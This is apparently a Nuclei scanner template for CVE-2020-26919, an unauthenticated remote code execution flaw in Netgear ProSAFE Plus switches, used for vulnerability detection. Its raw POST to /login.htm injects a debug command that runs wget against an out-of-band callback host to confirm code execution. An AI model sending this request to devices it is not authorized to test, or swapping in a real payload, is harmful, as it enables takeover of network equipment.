id: CVE-2020-26919

info:
  name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
  reference: |
    - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
    - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
  tags: cve,cve2020,netgear,rce,oob

requests:
  - raw:
      - |
        POST /login.htm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close

        submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"